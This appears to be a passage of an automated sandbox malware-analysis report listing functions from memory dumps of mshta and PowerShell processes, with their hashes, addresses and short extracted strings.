                                                Memory Dump Source
                                                • Source File: 00000002.00000003.1778038494.000001C9A1DE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C9A1DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_3_1c9a1de0000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                • Instruction ID: 66a6d58cc47cdeb45db4409ed351c35d836fc0d291d280ec9ef15ccc88c0e6ab
                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                • Instruction Fuzzy Hash: 4A9002595D540695E81411D10C4979C50406388395FD54880841691184D44D82A65192
                                                Function 000001C9A1DE0FA9 Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000003.1778038494.000001C9A1DE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C9A1DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_3_1c9a1de0000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                • Instruction ID: 66a6d58cc47cdeb45db4409ed351c35d836fc0d291d280ec9ef15ccc88c0e6ab
                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                • Instruction Fuzzy Hash: 4A9002595D540695E81411D10C4979C50406388395FD54880841691184D44D82A65192
                                                Function 000001C9A1DE0F81 Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000003.1778038494.000001C9A1DE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C9A1DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_3_1c9a1de0000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                • Instruction ID: 66a6d58cc47cdeb45db4409ed351c35d836fc0d291d280ec9ef15ccc88c0e6ab
                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                • Instruction Fuzzy Hash: 4A9002595D540695E81411D10C4979C50406388395FD54880841691184D44D82A65192
                                                Function 000001C9A1DE0F79 Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000003.1778038494.000001C9A1DE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C9A1DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_3_1c9a1de0000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                • Instruction ID: 66a6d58cc47cdeb45db4409ed351c35d836fc0d291d280ec9ef15ccc88c0e6ab
                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                • Instruction Fuzzy Hash: 4A9002595D540695E81411D10C4979C50406388395FD54880841691184D44D82A65192
                                                Function 000001C9A1DE0F99 Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000003.1778038494.000001C9A1DE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C9A1DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_3_1c9a1de0000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                • Instruction ID: 66a6d58cc47cdeb45db4409ed351c35d836fc0d291d280ec9ef15ccc88c0e6ab
                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                • Instruction Fuzzy Hash: 4A9002595D540695E81411D10C4979C50406388395FD54880841691184D44D82A65192
                                                Function 000001C9A1DE0F89 Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000003.1778038494.000001C9A1DE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C9A1DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_3_1c9a1de0000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                • Instruction ID: 66a6d58cc47cdeb45db4409ed351c35d836fc0d291d280ec9ef15ccc88c0e6ab
                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                • Instruction Fuzzy Hash: 4A9002595D540695E81411D10C4979C50406388395FD54880841691184D44D82A65192

                                                Executed Functions

                                                Function 00007FFD9AFC3A05 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1772625677.00007FFD9AFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AFC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9afc0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                • Instruction ID: 55680e5028829cb3ed2c505caeef5560b6d9b07114ecce0f8a915fb853b08f08
                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                • Instruction Fuzzy Hash: F401A73120CB0C8FD748EF0CE051AA5B3E0FB89364F10066DE58AC3691D632E891CB41
                                                Function 00007FFD9B0904D8 Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1773176819.00007FFD9B090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9b090000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 561c4c09c6762ff71ad5e4796e301880a5f23334e2d8b443fd9b78e0bf87d116
                                                • Instruction ID: 61414bb8594327512c90a7c2751d01c23b0029ce3b663f8b3281743a6181c5be
                                                • Opcode Fuzzy Hash: 561c4c09c6762ff71ad5e4796e301880a5f23334e2d8b443fd9b78e0bf87d116
                                                • Instruction Fuzzy Hash: E4E09223B0E82D0EEBA1A59828291B96281DF55A2170901B6E91DE2191ED04A8205281

                                                Executed Functions

                                                Function 07B73020 Relevance: 5.6, Strings: 4, Instructions: 643COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                • API String ID: 0-1420252700
                                                • Opcode ID: 1b9c2d48c4bede64b962f3b2ef78be4c5179abbba6008798038a37a0871db590
                                                • Instruction ID: 7c1bf1423df4e049ee5037628244f0312d2a4821ec5f0d2161a6441008776f49
                                                • Opcode Fuzzy Hash: 1b9c2d48c4bede64b962f3b2ef78be4c5179abbba6008798038a37a0871db590
                                                • Instruction Fuzzy Hash: 802247F1B083859FE7159B688811A6ABBE2EFC2310F1584EAD415CF391DB32DC45D7A2
                                                Function 07B717F8 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                • API String ID: 0-2049395529
                                                • Opcode ID: e9128c25d60d2409df50907a28a8c4c3f2c723ea0879ea74cc0ed456393cdb7c
                                                • Instruction ID: 28aaf66f74f5becae5cfed2ae0cfc22e99030f3de36a76538e0bc0fcbed64657
                                                • Opcode Fuzzy Hash: e9128c25d60d2409df50907a28a8c4c3f2c723ea0879ea74cc0ed456393cdb7c
                                                • Instruction Fuzzy Hash: 6F21BAF5B0010DDFEB259A5DD4486BEB3A2EBC5210F24C4ABD9268B254DB32C946C762
                                                Function 07B74F0C Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q
                                                • API String ID: 0-2697143702
                                                • Opcode ID: c7bf27912804670e3c32632d62d7767f63700bf5c200c4a0544b2e146f8eeccd
                                                • Instruction ID: 7dddc8616a6bf562821ad95f46b676b4484dc727b592556e96f0aa6ba91a9d12
                                                • Opcode Fuzzy Hash: c7bf27912804670e3c32632d62d7767f63700bf5c200c4a0544b2e146f8eeccd
                                                • Instruction Fuzzy Hash: 7D215FF17443868FEB154A7854112B6BBA2DFC2212F1484FBC429CF295EF32C895C791
                                                Function 050B2AB0 Relevance: .3, Instructions: 310COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1773048135.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_50b0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4766438754b81bda13033b2d7be52d5a3aaa9c89aa4b1ff315e5a78b7ec627d0
                                                • Instruction ID: 16e1eafd264dfcdeccdb59c19b597948a0d9c47861dc31656ca4cb7c9b9a806b
                                                • Opcode Fuzzy Hash: 4766438754b81bda13033b2d7be52d5a3aaa9c89aa4b1ff315e5a78b7ec627d0
                                                • Instruction Fuzzy Hash: 20D18974A0464A9FCB05CF59C4D49BEBBB1FF48310B24869AD815AB365C735FC51CBA0
                                                Function 07B73001 Relevance: .1, Instructions: 123COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bb28466f8d8b91f821099990eb8a21ec1c5038400d82e0be33d9ed8a2daf142b
                                                • Instruction ID: abb3b9de51c48dec54ae4949a64508e476cb976d5b8427c01169f816680128cb
                                                • Opcode Fuzzy Hash: bb28466f8d8b91f821099990eb8a21ec1c5038400d82e0be33d9ed8a2daf142b
                                                • Instruction Fuzzy Hash: C74129F1A04382EFEB158F288841B697BF2EF81301F1980E6D9109F692D736DD44DB62
                                                Function 050B2CA8 Relevance: .1, Instructions: 110COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1773048135.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_50b0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b7534258dfde3a1c9849d4a458bb5492734ee16dc868751c57f6cd0e0dcb1dd9
                                                • Instruction ID: fd4e6f98de63ca5f9bcfe51a8e95f2709e46ff4b423d9861c4e1e7c76a6991d6
                                                • Opcode Fuzzy Hash: b7534258dfde3a1c9849d4a458bb5492734ee16dc868751c57f6cd0e0dcb1dd9
                                                • Instruction Fuzzy Hash: 654113B8A005069FDB09CF59D594AFEBBB1FF48310B11859AD506AB264C736BC50CBA4
                                                Function 0342D006 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1771648347.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_342d000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3db7c49c963dfe19c021c3742dbd6ead52f0aac0b92dbb2b7fd959325440b40c
                                                • Instruction ID: bb3f586d17b8c99f3b3f945ea5ddd67800082cf754cecdf4058cdf0a730d7b7a
                                                • Opcode Fuzzy Hash: 3db7c49c963dfe19c021c3742dbd6ead52f0aac0b92dbb2b7fd959325440b40c
                                                • Instruction Fuzzy Hash: 0301407140E3C09ED7128B25C894B52BFB8EF47224F1DC5DBD9989F2A3C2699845C772
                                                Function 0342D01D Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1771648347.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_342d000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f814c0ab30f6eedff8f73e0a8d3a2ffc6fdcaae5949890844d5953bce4111b55
                                                • Instruction ID: 0a2d5c81bcc2b5af0b5a94444c01b069320e0f3e1e64f98a0c5d393a41519a41
                                                • Opcode Fuzzy Hash: f814c0ab30f6eedff8f73e0a8d3a2ffc6fdcaae5949890844d5953bce4111b55
                                                • Instruction Fuzzy Hash: C201F7718083109AE710CA25CD84767FF9CEF42328F0CC56BED686E256C279D842C6B5
                                                Function 050B9A12 Relevance: .0, Instructions: 34COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1773048135.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_50b0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 991d5736766994d01d35fd3984fce9ce168f72d251c5178a45271cc29027917e
                                                • Instruction ID: 2cbdf7df175839366e85b5422ad64a2ecc8590fe2ead3cea2de9f8759e434d0f
                                                • Opcode Fuzzy Hash: 991d5736766994d01d35fd3984fce9ce168f72d251c5178a45271cc29027917e
                                                • Instruction Fuzzy Hash: 72F09674E00104DFCB14CF99D8945ADF7B5FFC8310B248499D955A7751CB36AC52CB80

                                                Non-executed Functions

                                                Function 07B72670 Relevance: 14.2, Strings: 11, Instructions: 478COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$cl$cl$cl$cl
                                                • API String ID: 0-2708587798
                                                • Opcode ID: 6e5a83c8556d471318489f9dd244575a91011fec747adca6416b4a025d1629ab
                                                • Instruction ID: baf8cbf7833c70b1b0b7745b0e43bbdf5e13eedec5754a9318055d4a0f0c8c51
                                                • Opcode Fuzzy Hash: 6e5a83c8556d471318489f9dd244575a91011fec747adca6416b4a025d1629ab
                                                • Instruction Fuzzy Hash: 48F115B5B042058FEB259F6898016AABBF2FFC5310F1884BAD865CB351DB32DC45C7A1
                                                Function 07B719C0 Relevance: 12.8, Strings: 10, Instructions: 310COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$tP^q$tP^q$#]k$$^q$$^q$$^q$cl$cl
                                                • API String ID: 0-1313113490
                                                • Opcode ID: b6b3ff0c82ed74dd01fcf057f7b129794d953ca9c87e7ae73f8a6bb62a6f0dd6
                                                • Instruction ID: 33b4ae327188160f3a4b9b7d986d50c9d549af0624e39d38ee463f5f775fff82
                                                • Opcode Fuzzy Hash: b6b3ff0c82ed74dd01fcf057f7b129794d953ca9c87e7ae73f8a6bb62a6f0dd6
                                                • Instruction Fuzzy Hash: A1A124F270825D8FE7258ABD9400666BBE5EFC6210B1984EBD425CF3A1DA32DC45C7B1
                                                Function 07B720A0 Relevance: 11.7, Strings: 9, Instructions: 464COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q
                                                • API String ID: 0-696367261
                                                • Opcode ID: f0419543940b21daa04ae246b88657bea56a1a453d2e9f63b8fa9f5b334d9d31
                                                • Instruction ID: 78c91ddf54654af7446f5442a424644c7b23f382391328b6aeef4d53c5ef48fc
                                                • Opcode Fuzzy Hash: f0419543940b21daa04ae246b88657bea56a1a453d2e9f63b8fa9f5b334d9d31
                                                • Instruction Fuzzy Hash: 5AE126F1B043468FE7258B6898117EABFF2FF86310F1484EAD565CB252DA31C885C7A1
                                                Function 07B70758 Relevance: 10.3, Strings: 8, Instructions: 336COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$XRml$XRml$XRml$1]k$rml$rml
                                                • API String ID: 0-828692184
                                                • Opcode ID: fa80215b0a6e03121fa1e9941a4b6de55c7834757435041041bcd3fc7fceadda
                                                • Instruction ID: 5f585dcaf098d3202eb8534d07abdfbc1a1be1fab5c083b4615c4d36e9c3fc7b
                                                • Opcode Fuzzy Hash: fa80215b0a6e03121fa1e9941a4b6de55c7834757435041041bcd3fc7fceadda
                                                • Instruction Fuzzy Hash: 1FB146F1B043468FEB15AB7898106AABFE2EF86210F1580EBD555CF392DB31D845C7A1
                                                Function 07B71160 Relevance: 7.8, Strings: 6, Instructions: 330COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$4'^q$4'^q$x.^k$-^k
                                                • API String ID: 0-3490158111
                                                • Opcode ID: 5fc3765c9771aae464689b20b5b323def224e5f536d025cc69f164f7ed4857f4
                                                • Instruction ID: 88edde8e61e8f2ced04480797d34d7bec2c65b0cf10a17b5fbfccea5a925ae02
                                                • Opcode Fuzzy Hash: 5fc3765c9771aae464689b20b5b323def224e5f536d025cc69f164f7ed4857f4
                                                • Instruction Fuzzy Hash: 49D19FB0A002099FEB04DB58D551B9EBBE3EBC8304F158568D5016F7A5CB71EC86CBA5
                                                Function 07B71D80 Relevance: 6.5, Strings: 5, Instructions: 254COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$tP^q$tP^q$$]k
                                                • API String ID: 0-1527608752
                                                • Opcode ID: f284009e49ec9e431564066cdb294bb7cda2a164f1cb4ef2ab293e853dccfee2
                                                • Instruction ID: b250d3b4317beb22e704b00b7591ef6f8c78938e845fadacfa5ea8b5ecc130b8
                                                • Opcode Fuzzy Hash: f284009e49ec9e431564066cdb294bb7cda2a164f1cb4ef2ab293e853dccfee2
                                                • Instruction Fuzzy Hash: FB8126F1B1434D8FE7258A6C88017BABBB2ABC1311F1484AAD525DF2A1DB31DC45C7B2
                                                Function 07B74458 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q$cl$cl
                                                • API String ID: 0-2399376515
                                                • Opcode ID: 4e01bb59044f392cd2e0d103627fbd416354c0ecdb5ee7ec12ba4e86b4473b5f
                                                • Instruction ID: 4be53a0fb204755995ca0a8c9c1be4500cd3e36a227c878c0e6e78eace73ef38
                                                • Opcode Fuzzy Hash: 4e01bb59044f392cd2e0d103627fbd416354c0ecdb5ee7ec12ba4e86b4473b5f
                                                • Instruction Fuzzy Hash: 27119EB53043569BF7344D2AD805B67B7AAEFC0722F24C06AE869CB394CE31C845D390
                                                Function 07B71145 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$x.^k$-^k
                                                • API String ID: 0-773919728
                                                • Opcode ID: a052fa61dadcf2ec7a05e5851ac93817367c630d930275068435b345eb17e943
                                                • Instruction ID: 9dd142f6e8994650fd9c83c6927aaa20838df63817ef13cc80163566c16509fb
                                                • Opcode Fuzzy Hash: a052fa61dadcf2ec7a05e5851ac93817367c630d930275068435b345eb17e943
                                                • Instruction Fuzzy Hash: 30A17BB4A00209DFEB14CB58D541BAEBBB2FB88304F158599D5056F7A5CB31EC86CBA1
                                                Function 07B747E8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q$$^q
                                                • API String ID: 0-2125118731
                                                • Opcode ID: eb52d1714a8b96f5ca007c57bf8ab99d615521c57679547229ab23a2cd5a78da
                                                • Instruction ID: 9ae687862eb5fb925440075a3cde93a52d890d78f87a9517d319b75167e276ac
                                                • Opcode Fuzzy Hash: eb52d1714a8b96f5ca007c57bf8ab99d615521c57679547229ab23a2cd5a78da
                                                • Instruction Fuzzy Hash: 8A2187F171028E5BF72409699808B23B6DADFC1716F2484AE9525CF380CD76C844C2A1
                                                Function 07B704C9 Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1784107201.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7b70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                • API String ID: 0-2049395529
                                                • Opcode ID: 933f0e21be10b717a4b37ffd6c22337d6c391a6f98ffe0ab209e9476506c4338
                                                • Instruction ID: 1b8d8ab95f953ec4276a6fbbf63a6aa1fe0ed462dbd079cc626c2d6ef7ac3171
                                                • Opcode Fuzzy Hash: 933f0e21be10b717a4b37ffd6c22337d6c391a6f98ffe0ab209e9476506c4338
                                                • Instruction Fuzzy Hash: C901D6E1B0938A5FD32B222828201586FF25FD351076A04DBC091CF35ACD15CC49C766